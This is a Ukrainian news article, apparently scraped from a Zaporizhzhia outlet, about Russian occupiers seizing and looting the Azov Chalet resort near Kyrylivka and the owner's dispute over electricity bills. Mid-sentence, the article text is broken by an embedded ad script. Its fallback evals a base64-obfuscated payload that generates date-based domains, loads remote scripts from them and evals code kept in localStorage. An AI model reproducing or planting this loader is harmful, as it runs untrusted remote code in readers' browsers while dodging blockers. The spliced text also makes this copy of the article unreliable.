Окупанти розграбували базу відпочинку «Азов Шале», розташовану на «околиці» Федотової коси, в селищі Степок.
Півтора гектара території, аквапарк, три басейни, котеджі — ця «локація» була ледь не візитною карткою Кирилівки. Крім того, саме власники цієї бази відпочинку відреставрували славнозвісного оленя, який знаходиться на повороті на Кирилівську трасу,
Про долю бази відпочинку розповів власник «Азов Шале» Олег Сорока пише «Акцент» з посиланням на «РІА М».
«Азов Шале» було побудовано 2015 року. Поряд із «Белугою», «Перлиною Таврії» ця база відпочинку вважалася однією з найкращих на «кирилівському» узбережжі. Відповідно, вони були «віджаті» рашистами одними з перших.
Однак грабувати їх «під нуль» окупанти не поспішали — ще знадобляться, подумали вони.
Річ у тім, що на цих базах відпочинку була своя система опалення. А отже, там «визволителі» могли проживати і взимку.
— Взагалі-то, Кирилівка, як і Мелітополь, була окупована 25 лютого. Але кілька місяців російські військові в селище не заходили.
У самій Кирилівці весь цей час не було взагалі нікого, хто міг би стежити за порядком — і поліція, і прикордонники виїхали ще 23 лютого, за кілька годин до початку повномасштабного вторгнення.
Голова Кирилівської ОТГ Іван Малєєв як міг, організовував більш-менш стерпне життя для місцевого населення, організовував патрулі, щоб хоч хтось стежив за порядком і збереженням майна.
— В «Азов Шале» окупанти заїхали 2 серпня. Персонал, який там перебував, просто викинули. Мало того, одному зламали ребро, а другого мало не втопили в басейні.
Після цього базу відпочинку почали заселяти «потрібними» людьми.
— Мені відомо, що в грудні «Азов Шале» був забитий під зав’язку — найімовірніше, там перебували ті, хто рив окопи.
Крім інфраструктури, на базі відпочинку були квадроцикли, гідроцикли — ними активно користувалися курортники. Чи варто говорити, що все це добро вже вивезено окупантами var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
— Також перед самою війною я купив для бази відпочинку шість штучних пальм. Як справжні виглядали, не якась там дешевка. Кожна обійшлася в десять тисяч доларів. Напевно, як і квадроцикли, пішли ці пальми в невідомому напрямку.
Як йдуть справи на базі відпочинку наразі, Олегу Сороці невідомо. Однак після деокупації, найімовірніше, на власників абсолютно всіх подібних «локацій» чекає одна й та сама доля.
— Я думаю, що ми всі дуже здивуємося — тому що «визволителі» навіть дроти зі стін вирвуть. Перед втечею вони все розграбують до нуля — і не тільки приватний бізнес, а й комунальні підприємства. Нас про це ще українські військові попереджали — мовляв, будьте готові.
Окремим рядком Олег Сорока пройшовся по «Запоріжжяобленерго». Яке досі продовжує нараховувати величезні суми за спожиту на «Азов Шале» електроенергію.
— Оскільки зняти показання лічильників неможливо, «Запоріжжяобленерго» керувалося показаннями минулого року. І справно виставляло нам рахунки. Ми їх, звісно ж, не оплачували — в результаті у нас виникла величезна заборгованість, яку ми вважаємо незаконною.
Про все по порядку. 24 лютого 2022 року, відразу ж після повномасштабного вторгнення Росії, компанія, очолювана Олегом Сорокою, надіслала акт про припинення будь-якої діяльності на базі відпочинку.
Після початку повномасштабної війни Олег Сорока, природно, відправив листи в «Запоріжжяобленерго» — про те, що нарахування плати за електроенергію в умовах війни є незаконним.
А потім — із проханням про ненарахування цієї самої плати із 1 березня 2022 року і проведенні перерахунку.
На це в «Запоріжжяобленерго» відповіли: жодних підстав, для того, щоб не платити за спожиту електроенергію, у власника «Азов Шале» немає.
Але ж і саме «Запоріжжяобленерго» не може провадити жодної діяльності на окупованих територіях, інакше вони можуть бути звинувачені у фінансуванні тероризму.
І така ситуація, за словами власника «Азов Шале», спостерігається з усіма підприємствами, що перебувають в окупації.
— Іноді здається, що керівництво «Запоріжжяобленерго» — це російські агенти, — в серцях додає Олег Сорока. (adsbygoogle = window.adsbygoogle || []).push({});
Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/lamali-rebra-i-topili-personal-yak-roiyani-zahoplyuvali-bazu-vidpochinku-na-zaporizhzhi-foto/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook